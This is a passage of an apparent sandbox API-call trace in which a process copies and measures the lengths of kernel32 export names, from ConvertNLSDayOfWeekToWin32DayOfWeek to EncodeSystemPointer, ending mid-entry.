[0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.128] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.128] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.128] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.128] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.128] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.128] lstrlenA (lpString="COPYFILEA") returned 9 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.128] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.128] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.128] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.129] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.129] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.129] lstrlenA (lpString="COPYFILEW") returned 9 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.129] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.129] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.129] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.129] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.129] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.129] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.129] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.129] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.129] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.129] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.129] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.129] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.129] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.129] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.129] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.129] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.130] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.130] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.130] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.130] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.130] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.130] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.130] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.130] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.130] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.130] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.130] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.130] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.130] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.130] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.130] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.130] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.130] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.130] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.130] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.131] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.131] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.131] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.131] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.131] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.131] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.131] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.131] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.131] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.131] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.131] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.131] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.131] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.131] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.131] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.131] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.131] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.131] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.131] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.132] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.132] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.132] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.132] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.132] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.132] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.132] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.132] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.132] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.132] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.132] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.132] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.132] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.132] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.132] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.132] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.132] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.132] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.132] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.133] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.133] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.133] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.133] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.133] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.133] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.133] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.133] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.133] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.133] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.133] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.133] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.133] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.133] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.133] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.133] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.133] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.133] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.133] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.134] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.134] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.134] lstrlenA (lpString="DELETEATOM") returned 10 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.134] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.134] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.134] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.134] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.134] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.134] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.134] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.134] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.134] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.134] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.134] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.134] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.134] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.134] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.134] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.134] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.135] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.135] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.135] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.135] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.135] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.135] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.135] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.135] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.135] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.135] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.135] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.135] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.135] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: 